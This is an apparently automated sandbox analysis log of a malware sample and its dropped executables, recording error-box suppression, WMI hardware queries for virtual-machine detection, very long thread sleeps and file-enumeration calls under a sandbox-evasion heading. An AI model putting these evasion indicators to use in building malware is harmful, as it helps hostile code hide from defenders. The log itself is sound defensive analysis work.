            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe	Memory allocated: 1980000 memory reserve | memory write watch
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe	Memory allocated: 1B440000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Memory allocated: A80000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Memory allocated: 1A760000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Memory allocated: CB0000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Memory allocated: 1AA50000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Memory allocated: 1020000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Memory allocated: 1AE90000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Memory allocated: C70000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Memory allocated: 1AAD0000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Memory allocated: 1160000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Memory allocated: 1AFF0000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Memory allocated: 1470000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Memory allocated: 1AED0000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Memory allocated: FD0000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Memory allocated: 1AAE0000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Memory allocated: 1700000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Memory allocated: 1B400000 memory reserve | memory write watch
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe	Thread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 599878
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 599875
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 599765
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 599891
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 599781
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 599890
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 599781
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 599797
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe	Window / User API: threadDelayed 588
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe	Window / User API: threadDelayed 1572
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Window / User API: threadDelayed 364
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Window / User API: threadDelayed 582
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Window / User API: threadDelayed 503
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Window / User API: threadDelayed 835
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Window / User API: threadDelayed 1325
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Window / User API: threadDelayed 967
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Window / User API: threadDelayed 961
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Window / User API: threadDelayed 863
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Window / User API: threadDelayed 524
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Window / User API: threadDelayed 1491
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Window / User API: threadDelayed 1503
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Window / User API: threadDelayed 661
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Window / User API: threadDelayed 1775
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	Window / User API: threadDelayed 495
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe TID: 7748	Thread sleep count: 588 > 30
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe TID: 7740	Thread sleep count: 1572 > 30
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe TID: 7716	Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 6824	Thread sleep count: 364 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 1016	Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 4456	Thread sleep count: 582 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 3788	Thread sleep count: 503 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 3352	Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 3352	Thread sleep time: -600000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 3352	Thread sleep time: -599878s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 3492	Thread sleep time: -30000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7356	Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 2148	Thread sleep count: 835 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 2240	Thread sleep count: 191 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 2188	Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 4180	Thread sleep count: 1325 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 4216	Thread sleep count: 967 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5096	Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5096	Thread sleep time: -600000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5096	Thread sleep time: -599875s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5096	Thread sleep time: -599765s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7644	Thread sleep time: -30000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 4144	Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7184	Thread sleep count: 961 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 8172	Thread sleep count: 863 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5624	Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5624	Thread sleep time: -600000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 4220	Thread sleep time: -30000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 8136	Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7664	Thread sleep count: 524 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7632	Thread sleep count: 1491 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 1212	Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 1212	Thread sleep time: -600000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 1212	Thread sleep time: -599891s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 1212	Thread sleep time: -599781s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7044	Thread sleep time: -30000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 1820	Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 3628	Thread sleep count: 1503 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7284	Thread sleep count: 661 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7944	Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7944	Thread sleep time: -600000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7944	Thread sleep time: -599890s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7944	Thread sleep time: -599781s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 1528	Thread sleep time: -30000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 6840	Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5712	Thread sleep count: 1775 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 3972	Thread sleep count: 495 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5420	Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5420	Thread sleep time: -600000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5420	Thread sleep time: -599797s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 2836	Thread sleep time: -30000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 4256	Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 1780	Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe	File Volume queried: C:\ FullSizeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	File Volume queried: C:\ FullSizeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	File Volume queried: C:\ FullSizeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	File Volume queried: C:\ FullSizeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	File Volume queried: C:\ FullSizeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	File Volume queried: C:\ FullSizeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	File Volume queried: C:\ FullSizeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	File Volume queried: C:\ FullSizeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe	File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe	Code function: 0_2_0034A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0034A5F4
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe	Code function: 0_2_0035B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0035B8E0
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0036AAA8 FindFirstFileExA,0_2_0036AAA8
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0035DD72 VirtualQuery,GetSystemInfo,0_2_0035DD72
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599878Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599875
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599765
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
